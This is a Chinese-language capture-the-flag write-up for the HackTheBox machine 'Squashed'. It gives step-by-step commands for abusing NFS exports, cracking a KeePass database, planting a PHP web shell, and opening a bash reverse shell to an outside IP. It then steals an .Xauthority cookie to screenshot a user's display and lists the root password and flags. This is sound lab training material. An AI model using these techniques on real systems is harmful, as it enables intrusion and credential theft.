查看mount挂载
showmnout -e 10.129.218.138
挂载 /home/ross
sudo mount -t nfs 10.129.218.138:/home/ross ./test1
在 /Documents 文件下面发现 Passwords.kdbx
挂载 /var/www/html
sudo mount -t nfs 10.129.218.138:/var/www/html ./test1
.kdbx 文件由KeePass Password Safe创建,这是Windows的免费密码管理器;存储密码的加密数据库,该数据库只能使用用户设置的主密码查看;用于安全存储Windows、电子邮件帐户、FTP站点、电子商务站点和其他用途的个人登录凭据。
破解 Passwords.kdbx
1、将Passwords.kdbx下载到本地
2、将 Passwords.kdbx 内容转为 john 支持的格式: keepass2john Passwords.kdbx > hash.txt
3、然后使用 john 破解: john --wordlist=rockyou.txt hash.txt
使用 nmap 看一下文件夹的 nfs 权限。
sudo nmap 10.129.218.138 --script nfs-ls
/var/www/html 需要UID为 2017的用户
创建一个新账户
sudo useradd test
sudo usermod -u 2017 test
sudo su test
成功进入 /var/www/html
尝试在网站根目录写入木马文件
echo -e '<?php\n system($_REQUEST['cmd']);\n?>' > test3.php
成功执行命令
反弹shell
bash -c 'bash -i >& /dev/tcp/10.10.16.3/7898 0>&1'
本地监听
将 & 符号进行url编码为%26
http://10.129.218.138/test3.php?cmd=bash -c 'bash -i >%26 /dev/tcp/10.10.16.3/7898 0>%261'
升级shell
script /dev/null -c bash
创建一个 UID 为 1001 的用户。读取/home/ross/ .Xauthority 文件(https://stackoverflow.com/questions/37157097/how-does-x11-authorization-work-mit-magic-cookie/37367518#37367518)
sudo useradd test1
sudo usermod -u 1001 test1
以 base64编码 .Xauthority 文件 并传输至 /tmp/xauth
cat .Xauthority | base64 > /tmp/xauth
cd /tmp && python3 -m http.server
在 alex shell中下载此文件
使用w查看当前连接显示器的用户
现在使用 xwd 通过传递.Xauthority凭据文件截取用户 Ross 的屏幕截图:
cat xauth | base64 -d > xauth1
使用命令XAUTHORITY=/tmp/xauth1将其设置为我的会话。
{Xauthority。可以在每个用户的主目录中找到 .Xauthority 文件。它用于将凭据存储在 xauth 使用的 cookie 中以用于对 XServer 进行身份验证。启动 XServer 实例 (Xorg) 后,该 cookie 将用于对与该特定显示的连接进行身份验证。}
XAUTHORITY=/tmp/xauth1
export XAUTHORITY #export [.Xauthority文件的路径]
xauth list
(https://blog.csdn.net/weixin_33318722/article/details/116819263)
xwd -root -screen -silent -display :0 > out.xwd
-root 选择主根窗口,不需要我用鼠标选择一个子窗口(这在远程 shell 中是不可能的)
-screen 确保 GetImage 请求转到根窗口
-silent 关闭屏幕截图附带的典型铃声
display :0 指定要连接的窗口
(https://feichashao.com/xwd-screenshot/)
convert out.xwd out.png
获取root账户密码
root::cah$mei7rai9A
alex shell中提权到root
获取普通用户flag
a53dc2939c7f87d5b04d2158bde9aeba
获取 root flag
447fcdaf61c71dcbd881681eaaa57471
参考
https://hackmd.io/@tahaafarooq/squashed-hackthebox-writeup?utm_source=preview-mode&utm_medium=rec